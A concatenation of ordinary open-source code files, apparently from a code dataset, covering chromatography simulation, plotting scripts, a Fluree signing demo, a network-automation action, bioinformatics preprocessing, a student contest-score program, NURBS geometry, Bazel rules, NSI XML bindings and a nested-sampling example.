>>> acc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate ACC.
>>> f_out, c_out = acc_pro_a.evaluate(f_in, c_in)
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "ACC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by ACC.
Raises
------
NotImplementedError
Raises exception when function if called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCC(AlternatingChromatography):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column. The unbound (not captured)
part is propagated through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCC".
Notes
-----
For list of additional attributes refer to
:class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> load_recycle_pdf = _pdf.GaussianFixedDispersion(t, 2 * 2 / 30)
>>> pcc_pro_a = PCC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... load_recycle_pdf=load_recycle_pdf,
... # Porosity of the column for protein.
... column_porosity_retentate=0.64,
... uo_id="pro_a_pcc",
... gui_title="ProteinA PCC",
... )
>>> pcc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> pcc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> pcc_pro_a.equilibration_f_rel = 1
>>> # Load until 70 % breakthrough.
>>> pcc_pro_a.load_c_end_relative_ss = 0.7
>>> # Automatically prolong first cycle to faster achieve a steady-state.
>>> pcc_pro_a.load_extend_first_cycle = True
>>> # Define wash step.
>>> # There is no desorption during wash step in this example.
>>> pcc_pro_a.wash_cv = 5
>>> pcc_pro_a.wash_recycle = True
>>> pcc_pro_a.wash_recycle_duration_cv = 2
>>> # Elution step.
>>> pcc_pro_a.elution_cv = 3
>>> # 1st momentum of elution peak from data from above.
>>> pcc_pro_a.elution_peak_position_cv = 1.2
>>> pcc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> pcc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> pcc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate ACC.
>>> f_out, c_out = pcc_pro_a.evaluate(f_in, c_in) # doctest: +ELLIPSIS
pro_a_pcc: Steady-state concentration is being estimated ...
pro_a_pcc: Steady-state concentration is being estimated ...
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = False
"""Recycle wash. Default = False."""
self.column_porosity_retentate = column_porosity_retentate
"""Column porosity for binding species.
See Also
--------
:class:`PCC`
Examples
--------
`column_porosity_retentate` is a mean residence time of the
product (protein) traveling through the column during
non-binding conditions (in CVs).
"""
self.load_recycle_pdf = load_recycle_pdf
"""PDF of wash and/or unbound load traveling through the column.
See Also
--------
:class:`PCC`
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by PCC.
Raises
------
NotImplementedError
Raises exception when function if called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCCWithWashDesorption(PCC):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
The material desorption during wash step is defined by exponential
half life time
* :attr:`wash_desorption_tail_half_time_cv`
and the amount of desorbable material which is defined by
* :attr:`wash_desorption_desorbable_material_share` or
* :attr:`wash_desorption_desorbable_above_dbc`.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCCWithWashDesorption".
Notes
-----
During wash step, weaker binding isoforms might be desorbed and
recycled. In turn they are again desorbed and recycled during next
cycle and so on; resulting in increasing amount of desorbed material
during wash step (even in steady-state). This is not considered by
this class. Furthermore, it is not a favorable case in terms of RTD
as the weakly bound material propagates from column to column for
many cycles.
For list of additional attributes refer to
:class:`PCC` and :class:`AlternatingChromatography`.
See Also
--------
:class:`PCC`
:class:`AlternatingChromatography`
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCCWithWashDesorption"):
super().__init__(t, uo_id, load_bt, load_recycle_pdf,
column_porosity_retentate, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = True
"""Recycle wash. Default = `True`."""
self.wash_desorption = True
"""Simulate desorption during wash step. Default = `True`."""
self.wash_desorption_tail_half_time_cv = -1
"""Wash desorption rate.
Required if :attr:`wash_desorption` is `True`.
Wash desorption is simulated as exponential decay with half-life
:attr:`wash_desorption_tail_half_time_cv`.
"""
self.wash_desorption_desorbable_material_share = -1
"""Share of material that can be desorbed during wash step.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
self.wash_desorption_desorbable_above_dbc = -1
"""Share of material that can be desorbed during wash step.
Share is defined as a share of material loaded onto the column
that exceeds specified `wash_desorption_desorbable_above_dbc`
binding capacity.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
`self.wash_desorption_tail_half_time_cv` needs to be defined.
One of `self.wash_desorption_desorbable_material_share` and
`self.wash_desorption_desorbable_above_dbc` needs to be defined.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
"""
assert self.wash_desorption_tail_half_time_cv > 0
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._cv > 0
assert self.wash_desorption_desorbable_material_share > 0 \
or self.wash_desorption_desorbable_above_dbc > 0
assert f_load.size == c_bound.shape[1]
assert c_bound.shape[0] \
== self._n_species - len(self.non_binding_species)
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1)[:, _np.newaxis] \
* self._dt
# Calc share of desorbable material.
k = -1
if self.wash_desorption_desorbable_material_share > 0:
k = self.wash_desorption_desorbable_material_share
if self.wash_desorption_desorbable_above_dbc > 0:
if k > 0:
self.log.w(
f"Share of desorbable material defined twice!!"
f" Using `load_recycle_wash_desorbable_material_share`")
else:
k = max(0,
1 - self.wash_desorption_desorbable_above_dbc
* self._cv / m_bound.sum())
assert 1 >= k >= 0, f"Share of desorbable material {k}" \
f" must be >= 0 and <= 1."
i_wash_duration = int(round(self._wash_t / self._dt))
# Generate exponential tail.
exp_pdf = _pdf.TanksInSeries(self._t[:i_wash_duration],
n_tanks=1,
pdf_id=f"wash_desorption_exp_drop")
exp_pdf.allow_open_end = True
exp_pdf.trim_and_normalize = False
tau = self.wash_desorption_tail_half_time_cv \
* self._cv / self._wash_f / _np.log(2)
exp_pdf.update_pdf(rt_mean=tau)
p = exp_pdf.get_p()[_np.newaxis, :i_wash_duration]
# Scale desorbed material conc due to differences in flow rate.
c_desorbed = m_bound * k * p / self._wash_f
# Pad with zeros if needed.
c_desorbed = _np.pad(c_desorbed,
((0, 0),
(0, i_wash_duration - c_desorbed.shape[1])),
mode="constant")
# Log.
self.log.d_data(self._cycle_tree if hasattr(self, "_cycle_tree")
else self._log_tree,
"p_desorbed",
p)
return c_desorbed
| 2.828125 | 3 |
src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 0 | 10859 | import matplotlib.pyplot as plt
def main():
with open('log.txt') as f:
lines = f.readlines()
glob_loss = []
hm_l = []
off_l = []
poly_l = []
depth_l = []
glob_loss_val = []
hm_l_val = []
off_l_val = []
poly_l_val = []
depth_l_val = []
for epoch in lines:
m = epoch.split("|")
if m[0].split(':')[1] == ' AP':
glob_loss_val.append(float(m[1][5:-1]))
hm_l_val.append(float(m[2][5:-1]))
off_l_val.append(float(m[3][6:-1]))
poly_l_val.append(float(m[4][7:-1]))
depth_l_val.append(float(m[5][8:-1]))
else:
nb_epoch = int(m[0].split(":")[-1])
glob_loss.append(float(m[1][5:-1]))
hm_l.append(float(m[2][5:-1]))
off_l.append(float(m[3][6:-1]))
poly_l.append(float(m[4][7:-1]))
depth_l.append(float(m[5][8:-1]))
if len(m) > 8 :
glob_loss_val.append(float(m[7][5:-1]))
hm_l_val.append(float(m[8][5:-1]))
off_l_val.append(float(m[9][6:-1]))
poly_l_val.append(float(m[10][7:-1]))
depth_l_val.append(float(m[11][8:-1]))
plt.plot(glob_loss, label = "glob_loss")
plt.plot(hm_l, label = "hm_l")
plt.plot(off_l, label = "off_l")
plt.plot(poly_l, label = "poly_l")
plt.plot(depth_l, label = "depth_l")
plt.legend()
plt.savefig("loss_train.png")
plt.show()
plt.plot(glob_loss_val, label = "glob_loss_val")
plt.plot(hm_l_val, label = "hm_l_val")
plt.plot(off_l_val, label = "off_l_val")
plt.plot(poly_l_val, label = "poly_l_val")
plt.plot(depth_l_val, label = "depth_l_val")
plt.legend()
plt.savefig("loss_valid.png")
plt.show()
if __name__ == '__main__':
main()
| 2.59375 | 3 |
fluree/query-generate.py | ivankoster/aioflureedb | 4 | 10860 | <filename>fluree/query-generate.py
#!/usr/bin/python3
import json
from aioflureedb.signing import DbSigner
def free_test(signer):
data = {"foo": 42, "bar": "appelvlaai"}
body, headers, uri = signer.sign_query(data)
rval = dict()
rval["body"] = body
rval["headers"] = headers
rval["uri"] = uri
rval = json.dumps(rval, indent=4, sort_keys=True)
print(rval)
privkey = "<KEY>"
address = "1AxKSFQ387AiQUX6CuF3JiBPGwYK5XzA1A"
signer = DbSigner(privkey, address, "something/test")
free_test(signer)
| 2.40625 | 2 |
actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 5 | 10861 | <filename>actions/delete_bridge_domain.py
# Copyright 2016 Brocade Communications Systems, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from ne_base import NosDeviceAction
from ne_base import log_exceptions
import itertools
class DeleteBridgeDomain(NosDeviceAction):
"""
Implements the logic to Delete a BD on SLX devices.
This action achieves the below functionality
1.Delete single/list of bridge domains
"""
def run(self, mgmt_ip, username, password, bridge_domain_id,
bridge_domain_service_type):
"""Run helper methods to implement the desired state.
"""
try:
self.setup_connection(host=mgmt_ip, user=username, passwd=password)
except Exception as e:
self.logger.error(e.message)
sys.exit(-1)
changes = self.switch_operation(bridge_domain_id,
bridge_domain_service_type)
return changes
@log_exceptions
def switch_operation(self, bridge_domain_id, bridge_domain_service_type):
changes = {}
with self.pmgr(conn=self.conn, auth_snmp=self.auth_snmp) as device:
self.logger.info(
'successfully connected to %s to Delete bridge domain',
self.host)
if device.os_type == 'nos' or device.os_type == 'NI':
self.logger.error('Operation is not supported on this device')
raise ValueError('Operation is not supported on this device')
bridge_domain_list = list(itertools.chain.from_iterable(range(int(ranges[0]),
int(ranges[1]) + 1) for ranges in ((el + [el[0]])[:2]
for el in (miniRange.split('-')
for miniRange in bridge_domain_id.split(',')))))
changes['bd_delete'] = self._delete_bridge_domain(device,
bridge_domain_service_type,
bridge_domain_list, bridge_domain_id)
self.logger.info('Closing connection to %s after Deleting '
'bridge domain -- all done!',
self.host)
return changes
def _delete_bridge_domain(self, device, bridge_domain_service_type, bd_list, bd_id):
""" Deleting the bridge-domain """
try:
self.logger.info('Deleting bridge-domain %s', bd_id)
for each_bd in bd_list:
device.interface.bridge_domain(bridge_domain=str(each_bd), delete=True,
bridge_domain_service_type=bridge_domain_service_type)
except (ValueError, KeyError) as e:
self.logger.exception("Deleting bridge-domain failed due to %s"
% (e.message))
raise ValueError("Deleting bridge-domain failed")
return True
| 2.640625 | 3 |
python/signature.py | IUIDSL/kgap_lincs-idg | 4 | 10862 | #!/usr/bin/env python3
###
# Based on signature.R
###
import sys,os,logging
import numpy as np
import pandas as pd
if __name__=="__main__":
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
if (len(sys.argv) < 3):
logging.error("3 file args required, LINCS sig info for GSE70138 and GSE92742, and output file.")
sys.exit(1)
fn1 = sys.argv[1] #GSE70138_Broad_LINCS_sig_info_2017-03-06.txt.gz
fn2 = sys.argv[2] #GSE92742_Broad_LINCS_sig_info.txt.gz
ofile = sys.argv[3] #signature.tsv
#
part1 = pd.read_table(fn1, "\t", na_values=["-666", "-666.0"])
logging.info(f"columns: {part1.columns}")
part1 = part1[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
part2 = pd.read_table(fn2, "\t", na_values=["-666", "-666.0"], dtype="str")
part2.pert_time = part2.pert_time.astype(np.int32)
logging.info(f"columns: {part2.columns}")
part2 = part2[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
sign = pd.concat([part1, part2])
sign.drop_duplicates(subset=["sig_id"], keep="first", inplace=True)
sign.to_csv(ofile, "\t", index=False)
| 2.40625 | 2 |
HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 0 | 10863 | <reponame>916-Maria-Popescu/Fundamental-of-Programming
# ASSIGNMENT 3
"""
During a programming contest, each contestant had to solve 3 problems (named P1, P2 and P3).
Afterwards, an evaluation committee graded the solutions to each of the problems using integers between 0 and 10.
The committee needs a program that will allow managing the list of scores and establishing the winners.
Write a program that implements the functionalities exemplified below:
(A) Add the result of a new participant (add, insert)
(B) Modify scores (remove, remove between two postion, replace the score obtained by a certain participant at a
certain problem with other score obtained by other participant)
(C) Display participants whose score has different properties. """
def get(list, position):
""" The function will extract a certain element from a list."""
return list[int(position)]
def set(list, element, position):
""" The functin will set a certain element from a list.
:param list: [ ['2', '4', '8'], ['3', '5', '6'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ]
:param element: ['5', '8', '9']
:param position: 1
:return: [ ['2', '4', '8'], ['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10']
"""
list.insert(int(position), element)
list.remove(get(list, int(position) + 1))
def make_a_list(sentence):
""" The function will make a list containing the given scores P1, P2 and P3 that are found in the command."""
list_one_score = []
for i in range(1, 4):
list_one_score.append(sentence[i])
return list_one_score
def add_scores(list, sentence):
""" The function will add to the principal list (with all the scores of all the participants) a list with the
scores of just one participant.
"""
list.append(make_a_list(sentence))
def insert_scores(list, sentence, position):
""" The function will insert in a given position to the principal list (with all the scores of all the participants)
a list with the scores of just one participant
"""
list.insert(int(position), make_a_list(sentence))
def remove_one_part(list, position):
""" The function will set the scores of the participant at a given position to 0.
So that, the participant <position> score P1=P2=P3= 0. """
nul_element = ['0', '0', '0']
set(list, nul_element, position)
def remove_more_part(list, first_position, last_position):
""" The function will set the scores of all the participants between the first position and last position to 0.
For all the participants between <first_position> and <last_position>, P1=P1=P3= 0 """
nul_element = ['0', '0', '0']
for i in range(int(first_position), int(last_position) + 1):
set(list, nul_element, i)
def remove(list, cmd):
if len(cmd) == 2: # The command is remove <position>
remove_one_part(list, get(cmd, 1))
elif len(cmd) == 4: # The command is remove <first pos> to <last pos>
remove_more_part(list, get(cmd, 1), get(cmd, 3))
def replace(list, problem, new_score):
""" The function will replace a score obtained by a participant at a specific problem with a new score.
List represents the list with the scores of a participant, where <problem> ( P1/P2/P3 ) will recive a new score
"""
set(list, new_score, int(problem[1]) - 1)
def calc_average(list):
""" The function will calculate the average of all the integers from a list ( it will calculate the sum of al the
integers, and then it will divide the sum by the value of the len of tne list)
:param list: [ '2', '4', '3' ]
:return: 3
"""
result = 0
for i in range(0, len(list)):
result = result + int(get(list, i))
return result / len(list)
def average_score_lesser(list, number):
""" The function will display all the participants with an average score lesser than the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return:['10', '4', '6'], ['9', '3', '2']
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) < number:
l.append(get(list, i))
return l
def average_score_equal(list, number):
""" The function will display all the participants with an average score equal with the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 8
:return:['7', '8', '9']
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) == number:
l.append(get(list, i))
return l
def average_score_greater(list, number):
""" The function will return a list with all the participants with an average score greater than the given number.
:param list: [['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return: [['10', '10', '10'], ['7', '8', '9']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) > number:
l.append(get(list, i))
return l
def list_sorted(list):
""" The function will return a list with participants sorted in decreasing order of average score
:param list: [['5', '8', '9'], ['10', '4', '6'], ['10', '10', '10'], ['7', '8', '9'], ['10', '2', '9']]
:return: [['10', '10', '10'], , ['7', '8', '9'], ['5', '8', '9'], ['10', '2', '9'], ['10', '4', '6']]
"""
l = []
for i in range(0, len(list)):
get(list, i).insert(0, calc_average(get(list, i)))
l.append(get(list, i))
l.sort(reverse=True)
for i in range(0, len(l)):
get(l, i)
get(l, i).remove(get(get(l, i), 0))
return l
def list(list, cmd):
if len(cmd) == 1:
l = list
elif get(cmd, 1) == 'sorted':
l = list_sorted(list)
elif get(cmd, 1) == '<':
l = average_score_lesser(list, int(get(cmd, 2)))
elif get(cmd, 1) == '=':
l = average_score_equal(list, int(get(cmd, 2)))
elif get(cmd, 1) == '>':
l = average_score_greater(list, int(get(cmd, 2)))
print(l)
def print_menu():
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
print("The possible comands are:")
print(*commands, sep="\n")
def run_menu():
list_participants_scores = [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9'],
['8', '9', '10'], ['10', '2', '9'], ['2', '4', '6'], ['8', '2', '1'], ['0', '8', '4']]
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
while True:
comand = input()
comand_splited = comand.split()
first_word = get(comand_splited, 0)
if first_word == 'add': # The command is add P1, P2, P3
add_scores(list_participants_scores, comand_splited)
elif first_word == 'insert': # The command is insert [P1, P2, P3] at position
insert_scores(list_participants_scores, comand_splited, comand_splited[5])
elif first_word == 'remove':
remove(list_participants_scores, comand_splited)
elif first_word == 'replace': # The command is replace <old score> P1/P2/P3 with <new score>
replace(get(list_participants_scores, int(get(comand_splited, 1))), get(comand_splited, 2),
(get(comand_splited, 4)))
elif first_word == 'list':
(list(list_participants_scores, comand_splited))
else:
print("Wrong command")
break
if __name__ == '__main__':
print_menu()
run_menu()
| 4.46875 | 4 |
surface/ex_surface02.py | orbingol/NURBS-Python_Examples | 48 | 10864 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Examples for the NURBS-Python Package
Released under MIT License
Developed by <NAME> (c) 2016-2017
"""
import os
from geomdl import BSpline
from geomdl import utilities
from geomdl import exchange
from geomdl import operations
from geomdl.visualization import VisPlotly
# Fix file path
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# Create a BSpline surface instance
surf = BSpline.Surface()
# Set degrees
surf.degree_u = 3
surf.degree_v = 3
# Set control points
surf.set_ctrlpts(*exchange.import_txt("ex_surface02.cpt", two_dimensional=True))
# Set knot vectors
surf.knotvector_u = utilities.generate_knot_vector(surf.degree_u, 6)
surf.knotvector_v = utilities.generate_knot_vector(surf.degree_v, 6)
# Set evaluation delta
surf.delta = 0.025
# Evaluate surface
surf.evaluate()
# Plot the control point grid and the evaluated surface
vis_comp = VisPlotly.VisSurface()
surf.vis = vis_comp
surf.render()
# Evaluate surface tangent and normal at the given u and v
uv = [0.2, 0.9]
surf_tangent = operations.tangent(surf, uv)
surf_normal = operations.normal(surf, uv)
# Good to have something here to put a breakpoint
pass
| 2.765625 | 3 |
dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | 169 | 10865 | <filename>dev/bazel/deps/micromkl.bzl<gh_stars>100-1000
#===============================================================================
# Copyright 2020-2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
load("@onedal//dev/bazel:repos.bzl", "repos")
micromkl_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
"%{os}/include",
],
libs = [
"%{os}/lib/intel64/libdaal_mkl_thread.a",
"%{os}/lib/intel64/libdaal_mkl_sequential.a",
"%{os}/lib/intel64/libdaal_vmlipp_core.a",
],
build_template = "@onedal//dev/bazel/deps:micromkl.tpl.BUILD",
)
micromkl_dpc_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
],
libs = [
"lib/intel64/libdaal_sycl.a",
],
build_template = "@onedal//dev/bazel/deps:micromkldpc.tpl.BUILD",
)
| 1.492188 | 1 |
opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 0 | 10866 | ## Generated by pyxsdgen
from xml.etree import ElementTree as ET
# types
class OrderedStpType(object):
def __init__(self, order, stp):
self.order = order # int
self.stp = stp # StpIdType -> string
@classmethod
def build(self, element):
return OrderedStpType(
element.get('order'),
element.findtext('stp')
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'order' : str(self.order)})
ET.SubElement(r, 'stp').text = self.stp
return r
class TypeValueType(object):
def __init__(self, type_, value):
self.type_ = type_
self.value = value
@classmethod
def build(self, element):
return TypeValueType(
element.get('type'),
element.text
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'type' : self.type_})
r.text = self.value
return r
class P2PServiceBaseType(object):
def __init__(self, capacity, directionality, symmetricPath, sourceSTP, destSTP, ero, parameter):
self.capacity = capacity # long
self.directionality = directionality # DirectionalityType -> string
self.symmetricPath = symmetricPath # boolean
self.sourceSTP = sourceSTP # StpIdType -> string
self.destSTP = destSTP # StpIdType -> string
self.ero = ero # [ OrderedStpType ]
self.parameter = parameter # [ TypeValueType ]
@classmethod
def build(self, element):
return P2PServiceBaseType(
int(element.findtext('capacity')),
element.findtext('directionality'),
True if element.findtext('symmetricPath') == 'true' else False if element.find('symmetricPath') is not None else None,
element.findtext('sourceSTP'),
element.findtext('destSTP'),
[ OrderedStpType.build(e) for e in element.find('ero') ] if element.find('ero') is not None else None,
[ TypeValueType.build(e) for e in element.findall('parameter') ] if element.find('parameter') is not None else None
)
def xml(self, elementName):
r = ET.Element(elementName)
ET.SubElement(r, 'capacity').text = str(self.capacity)
ET.SubElement(r, 'directionality').text = self.directionality
if self.symmetricPath is not None:
ET.SubElement(r, 'symmetricPath').text = 'true' if self.symmetricPath else 'false'
ET.SubElement(r, 'sourceSTP').text = self.sourceSTP
ET.SubElement(r, 'destSTP').text = self.destSTP
if self.ero is not None:
ET.SubElement(r, 'ero').extend( [ e.xml('orderedSTP') for e in self.ero ] )
if self.parameter is not None:
for p in self.parameter:
ET.SubElement(r, 'parameter', attrib={'type': p.type_}).text = p.value
return r
POINT2POINT_NS = 'http://schemas.ogf.org/nsi/2013/12/services/point2point'
p2ps = ET.QName(POINT2POINT_NS, 'p2ps')
capacity = ET.QName(POINT2POINT_NS, 'capacity')
parameter = ET.QName(POINT2POINT_NS, 'parameter')
def parse(input_):
root = ET.fromstring(input_)
return parseElement(root)
def parseElement(element):
type_map = {
str(p2ps) : P2PServiceBaseType,
str(parameter) : TypeValueType
}
if not element.tag in type_map:
raise ValueError('No type mapping for tag %s' % element.tag)
type_ = type_map[element.tag]
return type_.build(element)
| 2.5 | 2 |
Scripts/PyLecTest.py | DVecchione/DVEC | 0 | 10867 | import matplotlib.pyplot as plt
import numpy as np
x=20
y=1
plt.plot(x,y)
plt.show()
| 3.03125 | 3 |
examples/nested/mog4_fast.py | ivandebono/nnest | 0 | 10868 | import os
import sys
import argparse
import copy
import numpy as np
import scipy.special
sys.path.append(os.getcwd())
def log_gaussian_pdf(theta, sigma=1, mu=0, ndim=None):
if ndim is None:
try:
ndim = len(theta)
except TypeError:
assert isinstance(theta, (float, int)), theta
ndim = 1
logl = -(np.sum((theta - mu) ** 2) / (2 * sigma ** 2))
logl -= np.log(2 * np.pi * (sigma ** 2)) * ndim / 2.0
return logl
class Gaussian(object):
def __init__(self, sigma=1.0, nderived=0):
self.sigma = sigma
self.nderived = nderived
def __call__(self, theta):
logl = log_gaussian_pdf(theta, sigma=self.sigma, mu=0)
return logl, [0.0] * self.nderived
class GaussianMix(object):
def __init__(self, sep=4, weights=(0.4, 0.3, 0.2, 0.1), sigma=1,
nderived=0):
assert len(weights) in [2, 3, 4], (
'Weights must have 2, 3 or 4 components. Weights=' + str(weights))
assert np.isclose(sum(weights), 1), (
'Weights must sum to 1! Weights=' + str(weights))
self.nderived = nderived
self.weights = weights
self.sigmas = [sigma] * len(weights)
positions = []
positions.append(np.asarray([0, sep]))
positions.append(np.asarray([0, -sep]))
positions.append(np.asarray([sep, 0]))
positions.append(np.asarray([-sep, 0]))
self.positions = positions[:len(weights)]
def __call__(self, theta):
thetas = []
for pos in self.positions:
thetas.append(copy.deepcopy(theta))
thetas[-1][:2] -= pos
logls = [(Gaussian(sigma=self.sigmas[i])(thetas[i])[0]
+ np.log(self.weights[i])) for i in range(len(self.weights))]
logl = scipy.special.logsumexp(logls)
return logl, [0.0] * self.nderived
def main(args):
from nnest import NestedSampler
g = GaussianMix()
def loglike(z):
return np.array([g(x)[0] for x in z])
def transform(x):
return 10. * x
volume_switch = 1.0 / (5 * args.num_slow)
sampler = NestedSampler(args.x_dim, loglike, transform=transform, log_dir=args.log_dir, num_live_points=args.num_live_points,
hidden_dim=args.hidden_dim, num_layers=args.num_layers, num_blocks=args.num_blocks, num_slow=args.num_slow,
use_gpu=args.use_gpu)
sampler.run(train_iters=args.train_iters, mcmc_steps=args.mcmc_steps, volume_switch=volume_switch, noise=args.noise)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--x_dim', type=int, default=5,
help="Dimensionality")
parser.add_argument('--train_iters', type=int, default=2000,
help="number of train iters")
parser.add_argument("--mcmc_steps", type=int, default=0)
parser.add_argument("--num_live_points", type=int, default=1000)
parser.add_argument('--switch', type=float, default=-1)
parser.add_argument('--hidden_dim', type=int, default=128)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('-use_gpu', action='store_true')
parser.add_argument('--flow', type=str, default='nvp')
parser.add_argument('--num_blocks', type=int, default=5)
